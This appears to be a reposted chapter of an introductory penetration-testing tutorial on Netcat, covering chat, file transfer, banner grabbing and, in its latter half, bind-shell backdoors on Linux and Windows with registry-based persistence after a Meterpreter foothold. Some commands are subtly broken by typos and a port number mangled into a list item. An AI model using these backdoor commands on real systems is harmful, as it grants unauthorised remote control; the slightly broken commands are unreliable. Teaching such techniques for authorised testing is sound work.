Introduction to pentesting: Maintaining Access with Backdoors and Rootkits

Netcat

Netcat is an incredibly and unbelievably flexible tool that allows communication and network traffic to flow from one machine to another. Although Netcat’s flexibility makes it an excellent choice for a backdoor, there are dozens of other uses for this tool. Netcat can be used to transfer files between machines, conduct port scans, serve as a simple instant messenger/chat and even function as a simple web server!. We’ll cover the basics here, but you should spend time practising and playing with Netcat. You’ll be amazed at what this tool is capable of. It is nicknamed the “swiss army knife” for a reson.

Netcat was originally written and released by Hobbit in 1996 and supports sending and receiving both TCP and UDP traffic. Netcan can function in either a client or server mode. When it is in client mode, the tool can be used to make a network connection to another service (including another instance of Netcat). It is important to remember that Netcan can connect from any port on your local machine to any port on the target machine. While Netcat is running in server mode, it acts as a listener where it waits to accept an incoming connection.

Let’s start with a very basic example of how we can use Netcat. In this example, we’ll set up Netcat to serve as a communication channel between two machines. To set this up on the first machine, we simply need to choose a port and instruct Netcat to run in listener mode. Issuing the following command in a terminal will accomplish this task:

nc -l -p 2323

In the command above, “nc” is used to invoke the Netcat program, whereas the “-l” is used to put Netcat into a listener mode. The “-p” is used to specify the port number we want Netcat to listen on. At this point, Netcat is runnign and waiting to accept an incoming connection on port 2323.

Now that we have Netcat listening on the first machine, we can move to the second machine. To make a connection to the listening machine, we issue the following command:

nc 192.168.1.7 2323

Running this command from the second PC will force Netcat to attempt a connection to port 2323 on the machine with an IP address of “192.168.1.7”. Because we have set up the first PC to act as a listener on that port, the two PCs should now be able to communicate. We can test this by typing text into either terminal window. Anything that we type into the terminal from either machine, will be displayed in the terminal window of both machines. This is because the keyboard is acting as the standard input and Netcat is simply transporting the data entered (keystrokes) over the connection.

To end the “chat” and close the session, we can issue the CTRL+C key comination; this will terminate the Netcat connection.

It is important to understand that once you kill or close the Netcat connection, you’ll need to restart the program on the target machine before making another connection. Constantly needing to connect to the target machine to restart Netcat is not very efficient. Fortunately, if you are using the Windows version of the program, Netcat provides a way to avoid this issue. In the Windows version of Netcat, if we start Netcat in listener mode using a “-L” rather than a “-l” the target will keep the connection open on the specified port even after the client disconnects. In many ways, this makes the program persistent. Of course, to make it truly persistent, you’d need to add the command to run every time the machine starts. On a windows machine, this could be accomplished by adding the Netcat program to the “HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run” registry hive.

Unfortunately, in terms of making a persistent network connection, the Linux version of Netcat is not quite straightforward. To make the Netcat connection persistent on a Linux machine, you’d have to write a simple bash script that forces Netcat to restart when the original connection is closed. If you are interested in creating a persistent connection, there are many examples to be found on the Internet.

Although the example above is an interesting use of Netcat and great for demonstrating the flexibility and power of the tool, actually you’ll probably never use the “chat” feature during a penetration test. On the other hand, once you have got Netcat uploaded to your target system, there are many practical uses for the tool. Let’s take a look at something a bit more advanageous, like transferring files.

Moving files between computers is easy when we have got the Meterpreter shell running, but remember, we don’t want to exploit the target every time. Rather, the goal is to exploit once and then leave a backdoor so we can return at a later date. If we upload Netcat to the target, we can use the program to transfer files to and from our target across a network.

For this example, assume you want to upload a new file from your local machine to the target machine. With Netcat running on the target machine, we issue the following command:

nc -l -p 7777 > calc.exe

This command will force the target to listen for an incoming connection on port

  1. Any input that is received will be stored into a file called “calc.exe”.

From our local machine, we need to use Netcat to make a connection to the target and specify the file we want to send to the target. We accomplish this by issuing the following command:

nc 192.168.1.10 < calc.exe

Unfortunately, Netcat doesn’t provide you any type of feedback letting you know when the transfer has been completed. Because you’ll receive no indication when the upload is done, it’s best to just wait for a few seconds and then issue a CTRL+C to kill the connection. At this point, you should be able to run the “ls” command on your target machine and see the newly created file.

Naturally, you could set up a Netcat connection to pull files from the target machine by reversing the commands above.

Ofentimes, during a penetration tets, you’ll discover open ports that provide little or no additional information. You may run across situations where both Nmap and Nessus are unable to discover the service behind the port. In these cases, it’s often very beneficial to use Netcat to make blind connection to the port. Once you have made the connection, you can begin sending information to the port by typing on the keyboard. In some instances, the keyboard input will elicit a response from the service. This response may be helpful in allowing you to identify the service. Consider the following example:

Assume you are conducting a penetration test on a target server. During the scanning process you discover that port 50001 is open. Unfortunately, neither your port scanner nor your vulnerability scanners were able to determine what service was running behind the port. In this case, it can be handy to use Netcat to interact with the unknown service. To force Netcat to attempt a connection to the service, we simply enter the following command:

nc 192.168.1.10 50001

This command will attempt to create a TCP connection to the port and service. It is important to note that you can force Netcat to send UDP packets by issuing the “-u” switch. Once the connection is made, in most cases it’s easiest to simply enter some etxt and hit return key to the service. If the service responds to the unexpected request, you may be able to derive its function.

As you can see, we used Netcat to create a connection to port “50001”. Once connected, the text “test” was sent through the connection. The service returned with a response that clearly indicates that the mysterious services is a web server. And even more important, the server was fully identified itself as an Apache server running version 2.2.9 on a Linux Ubuntu machine!.

Finally, we can use Netcat to bind itself a process and make that process available over a remote connection. This allows us to execute and interact with the bound program as if we were sitting at the target machine itself. If we start Netcat using the “-e” switch, it’ll execute whatever program we specify directly after the “-e”. The program will execute on the target machine and will run once a connection has been stablished. The “-e” parameter is incredibly powerful and very useful for setting up a backdoor shell on a target.

To set up a backdoor, we’ll utilize the “-e” switch to bind a command shell from the target machine to a port number. By setting up Netcat in this manner, laer when we initialize a connection to the specified port, the program listed after the “-e” switch will run. If we are using a Linux machine, we can accomplish this by typing the following into a terminal window:

nc -l -p 1234 -e /bin/sh

This will cause the target to serve up a shell to whoever connects to port 1234. Again, any commands sent from the Netcat client to the target machine will be executed locally, as if the attacker were sitting at the target.

This technique can also be used on a Windows machine. To provide command line backdoor access into a Windows machine, we’d run the following on the target (in a terminal window):

nc.exe -L -p 1234 C:\Windows\System32\cmd.exe

To put the preceding example into context and hopefully make it more concrete for you, let’s examine the following scenario to show how we could implement Netcat as a backdoor. Consider the following example: assume that we have successfully exploited a Windows target. Being forward-thinking penetration testers, we decide to create a more stable backdoor to this system so that we can return later. In this case, we have decided to use Netcat as our backdoor software.

The first order of bussiness would be to upload Netcat to the target machine; in this example, the Netcat executable has been uploaded to the target’s System32 directory. Let’s assume that we utilized the knowledge gained from Chapter 4 and we are currently using the Meterpreter shell to interact with our target. Once we have a Meterpreter shell on our target, we can upload the Netcat file to the victim by issuing the following command:

meterpreter> upload nc.exec C:\\Windows\\System32

Note: You’ll need to upload the Windows (.exe) version of Netcat because the target is running Windows.

In this case, we have uploaded the nc.exe program to the Windows\System32 directory. This will allow us to access the cmd.exe program directly. Once Netcat has been transferred to the target machine, we need to choose a port number, bind the cmd.exe program and start Netcat in server mode. This will force Necat to wait for an incoming connection on the specified port. To perform these tasks, we need to issue the following command in a terminal (again, assuming you are already in the same directory as Netcat).

meterpreter> nc -L -p 5777 -e cmd.exe

At this point, Netcat should be running on our target machine. Remember, if you were interested in making this backdoor truly persistent, with the ability to survive a reboot, you’d need to set the Netcat command to automatically start in the Window registry.

Now that Netcat is set up, we can close our Meterpreter shell and make a connection to the target using Netcat.

There should be a little doubt in your mind that Netcat is a truly powerful and flexible tool. In this section, we have barely scratched the surface. If you take some time to dig deeper into the program, you’ll find that people have been able to perform some rather amazing things using Netcat. You are encouraged to look into some of these clever implementations by searching the web, the results will amaze you.